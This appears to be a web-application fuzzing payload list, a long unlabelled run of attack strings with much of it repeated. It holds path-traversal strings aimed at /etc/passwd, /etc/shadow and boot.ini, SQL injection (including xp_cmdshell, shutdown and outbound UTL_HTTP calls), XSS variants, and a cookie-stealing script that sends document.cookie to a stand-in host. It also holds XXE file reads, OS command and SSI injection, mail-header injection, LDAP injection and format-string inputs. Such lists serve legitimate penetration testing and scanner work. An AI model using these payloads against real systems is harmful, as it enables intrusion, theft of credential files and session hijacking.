/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow /' /' /,%ENV,/ /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /.../.../.../.../.../ /../../../../../../../../%2A /../../../../../../../../../../../etc/passwd%00.html /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/shadow^^ /../../../../../../../../bin/id| /..\../..\../..\../..\../..\../..\../boot.ini /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow /./././././././././././etc/passwd /./././././././././././etc/shadow // //* /etc/passwd /etc/shadow /index.html|id| 0 0 or 1=1 00 0xfffffff 1 1 or 1 in (@@version)-- 1 or 1=1-- 1.0 1; waitfor delay '0:30:0'-- 1;SELECT%20* 1||Utl_Http.request('http://yourservername') from dual-- 2 2147483647 268435455 65536 :response.write 111111 ; ; ping 127.0.0.1 ; ;/usr/bin/id\n ;echo 111111 ;id ;id; ;id\n ;id| ;ls -la ;system('/usr/bin/id') ;system('cat%20/etc/passwd') ;system('id') ;|/usr/bin/id| script / script ! ![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]] ![CDATA[scriptvar n=0;while(true){n++;}/script]] /foo scriptalert("XSS");///script "'%;)(&+ ? ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////dev/random"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/passwd"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/shadow"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file://c:/boot.ini"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[' or 1=1 or ''=']]/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo HTML xmlns:xss?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"xss:xssXSS/xss:xss/HTML IMG """SCRIPTalert("XSS")/SCRIPT" IMG DYNSRC="javascript:alert('XSS')" IMG LOWSRC="javascript:alert('XSS')" IMG SRC="  javascript:alert('XSS');" IMG SRC="jav ascript:alert('XSS');" IMG SRC="jav	ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="javascript:alert('XSS')" IMG SRC="javascript:alert('XSS');" IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041 IMG SRC=javascript:alert('XSS') IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29 IMG SRC=JaVaScRiPt:alert('XSS') IMG SRC=`javascript:alert("'XSS'")` IMG SRC=javascript:alert("XSS") IMG SRC=javascript:alert('XSS') IMG SRC=javascript:alert(String.fromCharCode(88,83,83)) IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)' IMG%20SRC='javasc ript:alert(document.cookie)' IMG%20SRC='javascript:alert(document.cookie)' foo/foo name','')); phpinfo(); exit;/*/name scriptalert("XSS")/script scriptalert(document.cookie)/script xml ID="xss"IB<IMG SRC="javas!-- --cript:alert('XSS')">/B/I/xmlSPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xml ID=IXC![CDATA[IMG SRC="javas]]![CDATA[cript:alert('XSS');"]] xml SRC="xsstest.xml" ID=I/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xssscriptalert('XSS')/script/vulnerable youremail%0aBcc:youremail youremail%0aCc:youremail youremail%0d%0aBcc:youremail youremail%0d%0aCc:youremail = =' =-- =; ?x= ?x=" ?x= ?x=| @' @' @* @variable A ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| FALSE NULL PRINT PRINT @@variable TRUE XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` ['] ['] \ \";alert('XSS');// \"blah \' \' \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 \..\..\..\..\..\..\..\..\..\..\etc\shadow \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 \0 \00 \00\00 \00\00\00 \0\0 \0\0\0 \\ \\'/bin/cat%20/etc/passwd\\' \\'/bin/cat%20/etc/shadow\\' \\/ \\\\* \\\\?\\ \n/bin/ls -al\n \n/usr/bin/id; \n/usr/bin/id\n \n/usr/bin/id| \nid; \nid\n \nid| \nnetstat -a%\n \t \u003C \u003c \x23 \x27 \x27UNION SELECT \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * \x3C \x3D \x27 \x3D \x3B' \x3c ^' ^' ` `/usr/bin/id` `dir` `id` `perl -e 'print ".%p" x 80'`%n `ping 127.0.0.1` a);/usr/bin/id a);/usr/bin/id; a);/usr/bin/id| a);id a);id; a);id| a)|/usr/bin/id a)|/usr/bin/id; a)|id a)|id; a;/usr/bin/id a;/usr/bin/id; a;/usr/bin/id| a;id a;id; a;id| http://yourservername/ id%00 id%00| insert like limit null or or 0=0 # or 0=0 -- or 1=1-- or%201=1 or%201=1 -- response.write 111111 something%00html update x' or 1=1 or 'x'='y x' or name()='username' or 'x'='y xsstest xsstest%00"' {'} |/usr/bin/id |/usr/bin/id| |id |id; |id| |ls |ls -la |nid\n |usr/bin/id\n || || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & ||/usr/bin/id; ||/usr/bin/id| } ! !' !@#$%%^#$%#$@#$%$$@#$%^^**(() !@#0%^#0##018387@#0^^**(() " " or "a"="a " or "x"="x " or 0=0 # " or 0=0 -- " or 1=1 or ""=" " or 1=1-- "' or 1 --'" ") or ("a"="a "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////dev/random""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////etc/passwd""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[' or 1=1 or ''=']]/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo" "HTML xmlns:xss?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""xss:xssXSS/xss:xss/HTML" "xml ID=""xss""IBIMG SRC=""javas!-- --cript:alert('XSS')""/B/I/xmlSPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN" "xml ID=IXC![CDATA[IMG SRC=""javas]]![CDATA[cript:alert('XSS');""]]" "script" "scriptalert(1)/script "scriptdocument.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie/script "xxxPyyy "\t" # #' #' #xA #xA#xD #xD #xD#xA $NULL $null % %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% %00 %00../../../../../../etc/passwd %00../../../../../../etc/shadow %00/ %00/etc/passwd%00 %01%02%03%04%0a%0d%0aADSF %08x %0A/usr/bin/id %0A/usr/bin/id%0A %0Aid %0Aid%0A %0a ping -i 30 127.0.0.1 %0a %oa ping -n 30 127.0.0.1 %0a %0a id %0a %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+youremail%0aRCPT+TO:+youremail%0aDATA%0aFrom:+youremail%0aTo:+youremail%0aSubject:+tst%0afoo%0a%2e%0a %0d %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+youremail%0d%0aRCPT+TO:+youremail%0d%0aDATA%0d%0aFrom:+youremail%0d%0aTo:+youremail%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a %0d%0aX-Injection-Header:%20AttackValue %20 %20$(sleep%2050) %20'sleep%2050' %20d %20n %20s %20x %20| %21 %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %2500 %250a %26 %27%20or%201=1 %28 %29 %2A %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C %2C %2e%2e%2f %3C %3C%3F %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %5C %5C/ %60 %7C %7f %99999999999s %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %ff %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %s%p%x%d %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x & & id & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & &#0000060 < &#000060 < &#00060 < &#0060 < &#060 < 
 

 
 
 &#60 < &#X000003C < &#X000003c < &#X00003C < &#X00003c < &#X0003C < &#X0003c < &#X003C < &#X003c < &#X03C < &#X03c < &#X3C < &#X3c < &#x000003C < &#x000003c < &#x00003C < &#x00003c < &#x0003C < &#x0003c < &#x003C < &#x003c < &#x03C < &#x03c < &#x3C < &#x3c < &LT < ' '%20OR &id &lt < <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> <!--#exec%20cmd="/usr/bin/id;--> <>"'%;)(&+ &ltscript&gtalert(document.cookie);&ltscript&gtalert &ltscript&gtalert(document.cookie);/script ";id" ' ' (select top 1 ' -- ' ; ' UNION ALL SELECT ' UNION SELECT ' or ''=' ' or '1'='1 ' or '1'='1'-- ' or 'x'='x ' or (EXISTS) ' or 0=0 # ' or 0=0 -- ' or 1 in (@@version)-- ' or 1=1 or ''=' ' or 1=1-- ' or a=a-- ' or uid like '% ' or uname like '% ' or user like '% ' or userid like '% ' or username like '% '%20or%201=1 '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E '';!--"XSS=&{()} ') or ('a'='a '-- '; exec master..xp_cmdshell '; exec xp_regread '; waitfor delay '0:30:0'-- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))///SCRIPT!--SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPT=&{} ';shutdown-- 'scriptalert(document.cookie);/script 'scriptalert(document.cookie)/script 'hi' or 'x'='x'; 'or select * 'sqlattempt1 '||UTL_HTTP.REQUEST '||Utl_Http.request('http://yourservername') from dual-- ( (') (sqlattempt2) ) )))))))))) * *' *' *(|(mail=*)) *(|(objectclass=*)) */* *| + +%00 ,@variable - -- --'; --sp_password -1 -1.0 -2 -20 -268435455 ..%%35%63 ..%%35c ..%25%35%63 ..%255c ..%5c ..%bg%qf ..%c0%af ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini ..%u2215 ..%u2216 ../ ../../../../../../../../../../../../etc/hosts ../../../../../../../../../../../../etc/hosts%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/shadow ../../../../../../../../../../../../etc/shadow%00 ..\ ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 ..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow / /%00/ /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 /%2A /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow /' /' /,%ENV,/ /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /.../.../.../.../.../ /../../../../../../../../%2A /../../../../../../../../../../../etc/passwd%00.html /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/shadow^^ /../../../../../../../../bin/id| /..\../..\../..\../..\../..\../..\../boot.ini /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow /./././././././././././etc/passwd /./././././././././././etc/shadow // //* /etc/passwd /etc/shadow /index.html|id| 0 0 or 1=1 00 0xfffffff 1 1 or 1 in (@@version)-- 1 or 1=1-- 1.0 1; waitfor delay '0:30:0'-- 1;SELECT%20* 1||Utl_Http.request('http://yourservername') from dual-- 2 2147483647 268435455 65536 :response.write 111111 ; ; ping 127.0.0.1 ; ;/usr/bin/id\n ;echo 111111 ;id ;id; ;id\n ;id| ;ls -la ;system('/usr/bin/id') ;system('cat%20/etc/passwd') ;system('id') ;|/usr/bin/id| script / script ! ![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]] ![CDATA[scriptvar n=0;while(true){n++;}/script]] /foo scriptalert("XSS");///script "'%;)(&+ ? ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////dev/random"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/passwd"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/shadow"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file://c:/boot.ini"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[' or 1=1 or ''=']]/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo HTML xmlns:xss?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"xss:xssXSS/xss:xss/HTML IMG """SCRIPTalert("XSS")/SCRIPT" IMG DYNSRC="javascript:alert('XSS')" IMG LOWSRC="javascript:alert('XSS')" IMG SRC="  javascript:alert('XSS');" IMG SRC="jav ascript:alert('XSS');" IMG SRC="jav	ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="javascript:alert('XSS')" IMG SRC="javascript:alert('XSS');" IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041 IMG SRC=javascript:alert('XSS') IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29 IMG SRC=JaVaScRiPt:alert('XSS') IMG SRC=`javascript:alert("'XSS'")` IMG SRC=javascript:alert("XSS") IMG SRC=javascript:alert('XSS') IMG SRC=javascript:alert(String.fromCharCode(88,83,83)) IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)' IMG%20SRC='javasc ript:alert(document.cookie)' IMG%20SRC='javascript:alert(document.cookie)' foo/foo name','')); phpinfo(); exit;/*/name scriptalert("XSS")/script scriptalert(document.cookie)/script xml ID="xss"IB<IMG SRC="javas!-- --cript:alert('XSS')">/B/I/xmlSPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xml ID=IXC![CDATA[IMG SRC="javas]]![CDATA[cript:alert('XSS');"]] xml SRC="xsstest.xml" ID=I/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xssscriptalert('XSS')/script/vulnerable youremail%0aBcc:youremail youremail%0aCc:youremail youremail%0d%0aBcc:youremail youremail%0d%0aCc:youremail = =' =-- =; ?x= ?x=" ?x= ?x=| @' @' @* @variable A ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| FALSE NULL PRINT PRINT @@variable TRUE XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` ['] ['] \ \";alert('XSS');// \"blah \' \' \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 \..\..\..\..\..\..\..\..\..\..\etc\shadow \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 \0 \00 \00\00 \00\00\00 \0\0 \0\0\0 \\ \\'/bin/cat%20/etc/passwd\\' \\'/bin/cat%20/etc/shadow\\' \\/ \\\\* \\\\?\\ \n/bin/ls -al\n \n/usr/bin/id; \n/usr/bin/id\n \n/usr/bin/id| \nid; \nid\n \nid| \nnetstat -a%\n \t \u003C \u003c \x23 \x27 \x27UNION SELECT \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * \x3C \x3D \x27 \x3D \x3B' \x3c ^' ^' ` `/usr/bin/id` `dir` `id` `perl -e 'print ".%p" x 80'`%n `ping 127.0.0.1` a);/usr/bin/id a);/usr/bin/id; a);/usr/bin/id| a);id a);id; a);id| a)|/usr/bin/id a)|/usr/bin/id; a)|id a)|id; a;/usr/bin/id a;/usr/bin/id; a;/usr/bin/id| a;id a;id; a;id| http://yourservername/ id%00 id%00| insert like limit null or or 0=0 # or 0=0 -- or 1=1-- or%201=1 or%201=1 -- response.write 111111 something%00html update x' or 1=1 or 'x'='y x' or name()='username' or 'x'='y xsstest xsstest%00"' {'} |/usr/bin/id |/usr/bin/id| |id |id; |id| |ls |ls -la |nid\n |usr/bin/id\n || || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & ||/usr/bin/id; ||/usr/bin/id| } ! !' !@#$%%^#$%#$@#$%$$@#$%^^**(() !@#0%^#0##018387@#0^^**(() " " or "a"="a " or "x"="x " or 0=0 # " or 0=0 -- " or 1=1 or ""=" " or 1=1-- "' or 1 --'" ") or ("a"="a "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////dev/random""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////etc/passwd""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[' or 1=1 or ''=']]/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo" "HTML xmlns:xss?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""xss:xssXSS/xss:xss/HTML" "xml ID=""xss""IBIMG SRC=""javas!-- --cript:alert('XSS')""/B/I/xmlSPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN" "xml ID=IXC![CDATA[IMG SRC=""javas]]![CDATA[cript:alert('XSS');""]]" "script" "scriptalert(1)/script "scriptdocument.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie/script "xxxPyyy "\t" # #' #' #xA #xA#xD #xD #xD#xA $NULL $null % %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% %00 %00../../../../../../etc/passwd %00../../../../../../etc/shadow %00/ %00/etc/passwd%00 %01%02%03%04%0a%0d%0aADSF %08x %0A/usr/bin/id %0A/usr/bin/id%0A %0Aid %0Aid%0A %0a ping -i 30 127.0.0.1 %0a %oa ping -n 30 127.0.0.1 %0a %0a id %0a %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+youremail%0aRCPT+TO:+youremail%0aDATA%0aFrom:+youremail%0aTo:+youremail%0aSubject:+tst%0afoo%0a%2e%0a %0d %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+youremail%0d%0aRCPT+TO:+youremail%0d%0aDATA%0d%0aFrom:+youremail%0d%0aTo:+youremail%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a %0d%0aX-Injection-Header:%20AttackValue %20 %20$(sleep%2050) %20'sleep%2050' %20d %20n %20s %20x %20| %21 %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %2500 %250a %26 %27%20or%201=1 %28 %29 %2A %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C %2C %2e%2e%2f %3C %3C%3F %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %5C %5C/ %60 %7C %7f %99999999999s %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %ff %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i 